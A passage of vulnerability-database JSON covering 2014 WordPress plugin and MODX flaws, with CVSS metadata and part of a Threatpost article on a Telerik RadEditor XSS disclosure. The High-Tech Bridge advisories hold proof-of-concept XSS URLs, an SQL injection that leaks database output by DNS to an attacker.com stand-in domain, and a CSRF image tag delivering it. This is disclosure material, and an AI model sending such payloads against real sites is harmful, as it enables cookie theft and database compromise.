"patchstack", "title": "WordPress Google Calendar Events Plugin <= 2.0.3 - XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7138"], "modified": "2014-09-22T00:00:00", "id": "PATCHSTACK:D50E19BFB95A76A6DFABEA1CD209D2D4", "href": "https://patchstack.com/database/vulnerability/google-calendar-events/wordpress-google-calendar-events-plugin-2-0-3-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-01T19:47:46", "description": "Because of these vulnerabilities, the attackers can inject arbitrary web script or HTML via the \"form\" or \"enc\" parameter.\n\n## Solution\n\n\r\n Update the plugin. \r\n ", "cvss3": {}, "published": "2014-09-22T00:00:00", "type": "patchstack", "title": "WordPress Contact Form DB Plugin <= 2.8.15 - Multiple XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7139"], "modified": "2014-09-22T00:00:00", "id": "PATCHSTACK:96DBFDD4BB41FE75A97EB16B59946C00", "href": "https://patchstack.com/database/vulnerability/contact-form-db/wordpress-contact-form-db-plugin-2-8-15-multiple-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-01T19:47:50", "description": "Because of these vulnerabilities, the attackers can inject arbitrary web script or HTML via the \"callback\", \"dir\", or \"extensions\" parameters.\n\n## Solution\n\n\r\n Update the plugin. \r\n ", "cvss3": {}, "published": "2014-09-11T00:00:00", "type": "patchstack", "title": "WordPress Web-Dorado Photo Gallery Plugin <= 1.1.30 - Multiple XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6315"], "modified": "2014-09-11T00:00:00", "id": "PATCHSTACK:4943C5B29626925DFE7EDD92FD51BCDE", "href": "https://patchstack.com/database/vulnerability/photo-gallery/wordpress-web-dorado-photo-gallery-plugin-1-1-30-multiple-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-01T19:47:45", "description": "This WordPress All In One WP Security plugin is prone to an SQL injection. This vulnerability allows an attacker to modify data, compromise the access and application or exploit hidden vulnerabilities in the underlying database. \n\n## Solution\n\n\r\n Update the plugin. \r\n ", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "patchstack", "title": "WordPress All In One WP Security Plugin 3.8.2 - SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "PATCHSTACK:2712576DDEC94C81E6ED1EF8328A8F4B", "href": "https://patchstack.com/database/vulnerability/all-in-one-event-calendar1/wordpress-all-in-one-security-plugin-3-8-2-sql-injection", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-01T19:47:53", "description": "Because of this vulnerability, the attackers can inject arbitrary web script or HTML via the \"error\" parameter in the ewww-image-optimizer.php page to wp-admin/options-general.php.\n\n## Solution\n\n\r\n Update the plugin. \r\n ", "cvss3": {}, "published": "2014-09-04T00:00:00", "type": "patchstack", "title": "WordPress EWWW Image Optimizer Plugin <= 2.0.1 - XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6243"], "modified": "2014-09-04T00:00:00", "id": "PATCHSTACK:162BA16548FF5D9112FB6F4962DD6498", "href": "https://patchstack.com/database/vulnerability/ewww-image-optimizer/wordpress-ewww-image-optimizer-plugin-2-0-1-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "htbridge": [{"lastseen": "2020-12-24T11:23:40", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin. \n \n \n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138 \n \nInput passed via the \"gce_feed_ids\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_f eed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n\n", "edition": 2, "published": "2014-09-17T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7138"], "modified": "2014-10-07T00:00:00", "id": "HTB23235", "href": "https://www.htbridge.com/advisory/HTB23235", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:23:36", "description": "High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed. \n \n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139 \n \n1.1 Input passed via the \"form\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%2 2%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.2 Input passed via the \"enc\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22 %29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\n", "edition": 2, "published": "2014-09-17T00:00:00", "type": "htbridge", "title": "Two XSS in Contact Form DB WordPress plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7139"], "modified": "2014-09-26T00:00:00", "id": "HTB23233", "href": "https://www.htbridge.com/advisory/HTB23233", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:12:43", "description": "High-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315 \n \n1.1 Input passed via the \"callback\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550& extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb /%29;%3C/script%3E \n \n1.2 Input passed via the \"dir\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550& extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29; %3C/script%3E \n \n1.3 Input passed via the \"extensions\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550& extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/scri pt%3E \n \n\n", "edition": 2, "published": "2014-09-10T00:00:00", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6315"], "modified": "2014-09-10T00:00:00", "id": "HTB23232", "href": "https://www.htbridge.com/advisory/HTB23232", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:12:48", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735 \n \nThe vulnerability is caused by insufficient sanitization of the \"table\" HTTP GET parameter passed to \"/index.php\" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it. \n \nThe following exploitation example uses the alert() JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Eal ert%28%27immuniweb%27%29;%3C/script%3E \n \n\n", "edition": 2, "published": "2014-06-25T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in MyWebSQL", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4735"], "modified": "2014-06-25T00:00:00", "id": "HTB23221", "href": "https://www.htbridge.com/advisory/HTB23221", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:12:45", "description": "High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \n \n \n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242 \n \n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20 load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29, CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899 %29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR %28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111% 29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.: \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20l oad_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,C HAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899% 29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR% 28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%2 9,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \n \n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20 load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29, CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899 %29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR %28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111% 29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.: \n \n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28sele ct%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%2 9%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR %2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29 ,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%2 8111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\">\n", "edition": 2, "published": "2014-09-03T00:00:00", "type": "htbridge", "title": "Two SQL Injections in All In One WP Security WordPress plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-18T00:00:00", "id": "HTB23231", "href": "https://www.htbridge.com/advisory/HTB23231", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}, {"lastseen": "2020-12-24T11:12:47", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451 \n \nThe vulnerability exists due to insufficient sanitization of input data passed via the \"a\" HTTP GET parameter to \"/manager/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThis vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;% 22%3E\n", "edition": 2, "published": "2014-08-20T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in MODX Revolution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5451"], "modified": "2014-09-16T00:00:00", "id": "HTB23229", "href": "https://www.htbridge.com/advisory/HTB23229", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:23:30", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in EWWW Image Optimizer WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin. \n \n \n1) Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress plugin: CVE-2014-6243 \n \nInput passed via the \"page\" HTTP GET parameter to \"/wp-admin/options-general.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display administrator's cookies: \n \nhttp://wordpress/wp-admin/options-general.php?page=ewww-image-optimizer/ewww -image-optimizer.php&pngout=failed&error=%3Cscript%3Ealert%28document.cookie %29;%3C/script%3E \n \n\n", "edition": 2, "published": "2014-09-17T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress Plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6243"], "modified": "2014-09-25T00:00:00", "id": "HTB23234", "href": "https://www.htbridge.com/advisory/HTB23234", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:31:01", "bulletinFamily": "software", "cvelist": ["CVE-2014-7138"], "description": "The Simple Calendar \u2013 Google Calendar Plugin WordPress plugin was affected by a XSS security vulnerability.\n", "modified": "2019-11-27T23:23:45", "published": "2014-10-08T00:00:00", "id": "WPVDB-ID:FDA9876C-3A05-42F6-9BF8-92B2E40715C2", "href": "https://wpscan.com/vulnerability/fda9876c-3a05-42f6-9bf8-92b2e40715c2", "type": "wpvulndb", "title": "Google Calendar Events < 2.0.4 - XSS", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-15T22:34:38", "bulletinFamily": "software", "cvelist": ["CVE-2014-7139"], "description": "The contact-form-7-to-database-extension WordPress plugin was affected by a 2 x Cross-Site Scripting (XSS) security vulnerability.\n", "modified": "2019-10-21T12:08:19", "published": "2014-10-09T11:38:40", "id": "WPVDB-ID:6BED0047-0F82-40D7-876F-88BF363AA55C", "href": "https://wpscan.com/vulnerability/6bed0047-0f82-40d7-876f-88bf363aa55c", "type": "wpvulndb", "title": "Contact Form DB 2.8.13 - 2 x Cross-Site Scripting (XSS)", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-15T22:20:00", "bulletinFamily": "software", "cvelist": ["CVE-2014-6315"], "description": "The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery WordPress plugin was affected by a Cross Site Scripting security vulnerability.\n", "modified": "2019-10-21T12:49:31", "published": "2014-10-01T00:00:00", "id": "WPVDB-ID:9285F0B4-1E9F-49D6-A831-4B9F0F0C40A2", "href": "https://wpscan.com/vulnerability/9285f0b4-1e9f-49d6-a831-4b9f0f0c40a2", "type": "wpvulndb", "title": "Photo Gallery 1.1.30 - Cross Site Scripting", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-15T22:08:29", "bulletinFamily": "software", "cvelist": ["CVE-2014-6242"], "description": "The All In One WP Security & Firewall WordPress plugin was affected by a 2xSQL Injections security vulnerability.\n", "modified": "2019-10-21T12:00:27", "published": "2014-09-26T20:53:31", "id": "WPVDB-ID:5398C513-15C7-40EF-8E77-DDCB73174956", "href": "https://wpscan.com/vulnerability/5398c513-15c7-40ef-8e77-ddcb73174956", "type": "wpvulndb", "title": "All In One WP Security plugin 3.8.2 - 2xSQL Injections", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-02-15T22:20:53", "bulletinFamily": "software", "cvelist": ["CVE-2014-6243"], "description": "The EWWW Image Optimizer WordPress plugin was affected by a Cross-Site Scripting (XSS) security vulnerability.\n", "modified": "2019-10-21T12:09:10", "published": "2014-10-09T11:35:03", "id": "WPVDB-ID:17401705-5F44-47D6-920E-EC058D426114", "href": "https://wpscan.com/vulnerability/17401705-5f44-47d6-920e-ec058d426114", "type": "wpvulndb", "title": "EWWW Image Optimizer 2.0.1 - Cross-Site Scripting (XSS)", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:04", "bulletinFamily": "info", "cvelist": ["CVE-2014-4958"], "description": "All versions of an HTML editor used in several Microsoft technologies, including ASP.NET, suffer from a high-risk cross-site scripting (XSS) vulnerability that could allow an attacker to inject malicious script and glean private information.\n\nThe problem exists in all versions of RadEditor, a WYSIWYG text editor manufactured by Bulgaria-based firm Telerik, according to security researcher G.S. McNamara, who disclosed the vulnerability on [his blog late last week](<http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/>).\n\n\u201cTechnically speaking, this is a massive hole in how existing input validation security filters work in unison,\u201d McNamara said in an email Thursday to Threatpost regarding the vulnerability.\n\nThe editor, which allows users to input rich-text, is used to varying degrees in Microsoft products like [MSDN, CodePlex, TechNet, and MCMS, along with some Sharepoint and ASP.NET implementations](<http://demos.telerik.com/aspnet-ajax/editor/examples/overview/defaultcs.aspx>).\n\n\u201cIt\u2019s a silent killer, too, because at least one commercial penetration-testing tool failed to find it\u201d McNamara said, \u201cYou just get a false negative.\u201d\n\nMcNamara initially found the vulnerability (CVE-2014-4958) in a 2009 version (2009.3.1208.20) of the product on Internet Explorer along with a 2014 version but suggests it could have existed in previous iterations of the editor.\n\n\u201cI just had a hunch and followed it obsessively, manually,\u201d McNamara said of his search for the bug, which he first dug up on July 9.\n\nFrom there it took about two months of going back and forth with the company.\n\nWhen he first contacted Telerik\u2019s Customer Support department, it insisted the bug had already been fixed. To prove his case McNamara forwarded the company his exploit code. When Telerik still wouldn\u2019t put him in touch with anyone in charge of security, McNamara ultimately had to go through what he calls \u201cunofficial channels,\u201d by sending a personal email to a Telerik employee\u2019s Gmail account in late August, to finally get the ball rolling.\n\nIt wasn\u2019t until earlier this month that the researcher and the company agreed to coordinate a disclosure. Yet after two weeks of radio silence from Telerik \u2013 McNamara claims he made multiple phone calls, emails, requests to high-level account managers \u2013 he decided to disclose the bug independently \u2014 only to have the company release its information \u201cout of the blue,\u201d hours before he was planning on releasing his, last Wednesday.\n\n\u201cResolving this politely was tough,\u201d McNamara admits, claiming the issue lasted as long as it did due to a lapse in responsibility.\n\n\u201cThis is a technical product sold to technical developers, and Telerik wanted the developers to share the responsibility of security. The developers probably didn\u2019t know that,\u201d McNamara said.\n\nWhile RadEditor\u2019s filters cover some attack vectors \u2013 namely the RemoveScripts filter to strip out script tags \u2013 the attack technique that McNamara used \u201cis not your typical XSS.\u201d\n\n\u201cBy using lesser-known attacks I found a way through,\u201d McNamara said, adding that he put to use some old research by WhiteHat Security\u2019s Jeremiah Grossman to help dig up the vulnerability.\n\nSpecifically the vulnerability employs attribute-based cross-site scripting without relying on JavaScript tags. It\u2019s also harder to detect because the web editor has to process many different obfuscated elements, notably dynamic properties like CSS Expressions, used in older builds of IE, in addition to JavaScript.\n\nIn a blog entry Telerik [posted on Wednesday](<http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks>) the company addressed the issue and gave credit to McNamara but stood pat on its stance that the responsibility of sanitizing content to prevent threats should fall to the developer.\n\n\u201cIt is always the duty of the developer to implement the necessary content validation,\u201d Nikodim Lazarov, one of the company\u2019s senior software developers wrote.\n\nThe company is slated to push out a patch for the issue but not until it updates the Q3 edition of its controls, in late October. In the meantime Telerik is [giving users a workaround](<http://feedback.telerik.com/Project/108/Feedback/Details/137364-prevent-possible-xss-attack-in-radeditor-using-malicious-content-in-ie>) that it\u2019s strongly recommending users follow until its patch is pushed.\n\nMcNamara, who works as an application security engineer at the IT services provider CGI, says that he\u2019s planning to do further research in his spare time on other 